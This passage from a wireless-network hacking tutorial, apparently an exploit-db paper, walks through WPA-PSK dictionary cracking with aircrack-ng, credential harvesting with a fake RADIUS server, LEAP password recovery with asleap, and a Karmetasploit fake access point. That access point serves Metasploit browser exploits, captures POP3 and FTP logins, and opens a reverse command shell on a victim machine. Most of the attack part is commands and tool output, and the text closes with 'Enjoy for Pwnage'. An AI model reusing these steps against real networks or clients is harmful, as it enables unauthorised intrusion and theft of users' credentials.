We assume that we capture this process in workshop.cap file. So, we perform cracking by using aircrack.
#aircrack-ng -w wordlist --bssid xx:xx:xx:xx:xx:xx workshop-02.cap
The successful result is following.
--------------------------------------------------------------------------------
Opening test-02.cap
Read 252 packets.
# BSSID ESSID Encryption
1 xx:xx:xx:xx:xx:xx Workshop WPA (1 handshake)
Choosing first network as target.
Opening workshop-02.cap
Reading packets, please wait...
Aircrack-ng 1.0 rc1 r1085
[00:00:00] 0 keys tested (0.00 k/s)
KEY FOUND! [ TheFuckinWPAKey ]
Master Key : 3C 57 0F 3A 55 E5 C5 27 8E 93 02 F2 F9 21 2C D4
E2 48 6C DF 59 8D 19 19 B5 F2 80 BE 81 15 10 63
Transcient Key : E3 91 AD 02 78 A5 51 DE 2A AE 15 25 DB 9B 4A F6
61 A7 42 D8 32 9B 48 37 01 80 0B A7 83 F9 67 B2
9B FE 47 EA 0A B8 E0 2D E0 81 6E BB 48 1F AA 86
2A 7E B0 F7 BE C8 2B 8F 14 DF AB 6F 58 28 8E E1
EAPOL HMAC : EC 94 29 B7 1F 1F 8E F7 25 78 E9 E1 C6 4E 51 3D
--------------------------------------------------------------------------------
From this result, it means WPA-PSK/WPA2-PSK key is "TheFuckinWPAKey".
#############################################################
[0x08] - Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
#############################################################
Most companies turned to use public key encryption with wireless network and they think that
it is perfectly safe. But the tricky hacker still attacks this system by spoofing certificate.
This attacking method takes an advantage of client incaution. Many clients accept certification
without considering whether it is genuine certificate or not. This make attacker impersonate himself
to be radius server and loggin credential information from victims.
We can use freeradius as fake radius server combining with wpe patch to enable loggin credential
information on freeradius server
8 of 12 12/24/10 5:48 PM
9. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
additional information: http://www.willhackforsushi.com/FreeRADIUS_WPE.html
################################
[0x09] - Exploiting CISCO LEAP
################################
Cisco proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process helps eliminate se
by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys. Cisco LEAP is one of the extens
types specified by 802.1X.
LEAP is easy to implement and contains compelling features such as:
- Mutual Authentication
- User-Based Authentication
- Dynamic WEP Keys
We found username that send to Radius is plaintext that captured from wireshark but password was encrypted, So It's also V
asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords
- Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
- Deauthentication of clients on a leap WLAN (speeding up leap password recovery) AIRJACK DRIVER REQUIRED
Download Here: http://asleap.sourceforge.net/
First step, Use asleap to produce the necessary database (.dat) and index files (.idx)
#./genkeys -r dict -f dict.dat -n dict.idx
dict = Our wordlist/dictionary file, with one word per line
dict.dat = Our new output pass+hash file (generated as a result of running this command)
dict.idx = Our new output index filename (generated as a result of running this command)
#./genkeys -r dictionary -f dict.dat -n dict.idx
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
-----------------------------------------------------------------------
The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx file
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
leap.dump = Our libpcap packet capture file (NOTE: Any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) c
dict.dat = Our output pass+hash file (generated with genkeys, see above)
dict.idx = Our new output index filename (generated with genkeys, see above)
#./asleap -r data/leap.dump -f dict.dat -n dict.idx
-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
username: qa_leap
challenge: 0786aea0215bc30a
response: 7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
hash bytes: 4a39
NT hash: a1fc198bdbf5833a56fb40cdd1a64a39
password: qaleap
Closing pcap ...
-----------------------------------------------------------------------
Notice: The successful rate is up to dictionary size
Now ASLEAP 2.2, which includes the “-C†and “-R†options to specify the hex-delimited bytes for the challenge an
##########################################
[0x10] - Mass Exploit with Karmetasploit
##########################################
HD Moore released some documentation (http://trac.metasploit.com/wiki/Karmetasploit) to get karmetasploit working with the
Karmetasploit can launch fake AP and exploit the client who connects to the fake AP. Hacker can log cookie, ftp, http, cre
of the client and still also exploit the browser vulnerabilities on client machine.
This Method was test in Backtrack3 (Final)
1. Update Aircrack-NG
$ svn co http://trac.aircrack-ng.org/svn/trunk/ aircrack-ng
$ make
# make install
9 of 12 12/24/10 5:48 PM
10. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
2. Let's do our aireplay-ng test to see if things are working (Your WIFI card must support for Injection packet)
bt# aireplay-ng -9 wlan0
15:10:21 Trying broadcast probe requests...
15:10:21 Injection is working!
15:10:25 Found 5 APs
15:10:25 Trying directed probe requests...
15:10:26 00:1E:58:33:83:71 - channel: 2 - 'CITEC'
15:10:35 0/30: 0%
15:10:37 00:14:06:11:42:A2 - channel: 6 - 'WORKSHOP'
15:10:42 0/30: 0%
15:10:42 00:13:19:5F:D1:D0 - channel: 11 - 'VICTIM'
15:10:48 Ping (min/avg/max): 3.325ms/126.125ms/201.281ms Power: 83.27
15:10:48 5/30: 60%
15:10:48 Injection is working!
15:56:48 00:14:06:11:42:A0 - channel: 11 - 'Mywifi'
15:56:53 0/30: 0%
Now It's work for Injection !!
3. Update Metasploit
$ svn co http://metasploit.com/svn/framework3/trunk msf3
4. Download Bash script from http://www.darkoperator.com/kmsapng.tgz
The script will do the following:
- Change the MAC address of the interface
- Set the Interface in Monitor Mode
- Start the Karma AP with Airbase-ng
- Change the MTU Size for the interface
- Set the IP
- Start the DHCPD server
- Set in iptables a redirect of all traffic to it self so as to bypass cached DNS entries
- Start Metasploit.
6. After that we run our kmsapng.sh like this:
#./kmsapng.sh -i wlan0 -m km -s linksys
Changing MAC Address
Current MAC: 00:0f:c1:08:12:91 (Wave Corporation)
Faked MAC: 00:40:1b:5b:b0:0b (Printer Systems Corp.)
starting fake ap
This will take 15 seconds ..............
DHCPD started successfully
Starting Packet capture to /root/kms.cap
Starting Metasploit
_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / _|/ _|/ / _| |
| | |_/|__/|_/_/|_/ / |__/ |__/__/ |_/|_/
/|
|
=[ msf v3.2-release
+ -- --=[ 304 exploits - 124 payloads
+ -- --=[ 18 encoders - 6 nops
=[ 79 aux
resource> load db_sqlite3
[*] Successfully loaded plugin: db_sqlite3
resource> db_create /root/karma.db
[*] The specified database already exists, connecting
[*] Successfully connected to the database
[*] File: /root/karma.db
resource> use auxiliary/server/browser_autopwn
resource> setg AUTOPWN_HOST 172.16.1.207
AUTOPWN_HOST => 172.16.1.207
resource> setg AUTOPWN_PORT 55550
AUTOPWN_PORT => 55550
resource> setg AUTOPWN_URI /ads
AUTOPWN_URI => /ads
resource> set LHOST 172.16.1.207
LHOST => 172.16.1.207
resource> set LPORT 45000
LPORT => 45000
resource> set SRVPORT 55550
SRVPORT => 55550
resource> set URIPATH /ads
URIPATH => /ads
resource> run
10 of 12 12/24/10 5:48 PM
11. Vulnerability analysis, Security Papers, Exploit Tutorials http://www.exploit-db.com/papers/12956/
[*] Starting exploit modules on host 172.16.1.207...
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_compareto
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_compareto
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/mozilla_navigatorjava
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/multi/browser/firefox_queryinterface
[*] Local IP: http://127.0.0.1:55550/exploit/multi/browser/firefox_queryinterface
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/apple_quicktime_rtsp
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/novelliprint_getdriversettings
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms03_020_ie_objecttype
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ie_createobject
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ie_createobject
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_067_keyframe
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_067_keyframe
[*] Server started.
[*] Started reverse handler
[*] Using URL: http://0.0.0.0:55550/exploit/windows/browser/ms06_071_xml_core
[*] Local IP: http://127.0.0.1:55550/exploit/windows/browser/ms06_071_xml_core
[*] Server started.
[*] Started reverse handler
[*] Server started.
[*] Using URL: http://0.0.0.0:55550/ads
[*] Local IP: http://127.0.0.1:55550/ads
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 110
SRVPORT => 110
resource> set SSL false
SSL => false
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/pop3
resource> set SRVPORT 995
SRVPORT => 995
resource> set SSL true
SSL => true
resource> run
[*] Server started.
[*] Auxiliary module running as background job
resource> use auxiliary/server/capture/ftp
resource> run
[*] Server started.
...
...
[*] Sending Firefox location.QueryInterface() Code Execution to 10.0.0.252:1493...
[*] Command shell session 2 opened (10.0.0.1:45001 -> 10.0.0.252:1507)
msf auxiliary(http) > sessions -i 2
[*] Starting interaction with 2...
Microsoft Windows XP [Vesion 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
D:Mozilla Firefox> cd ..
D:net user
User accounts for CWH
-------------------------------------------------------------------------------
__vmware_user__ Administrator ASPNET
Guest HelpAssistant IUSR_CWH
IWAM_CWH CWH SUPPORT_388945a0
The command completed successfully.
Enjoy for Pwnage !!. Oops, For pentest :p
11 of 12 12/24/10 5:48 PM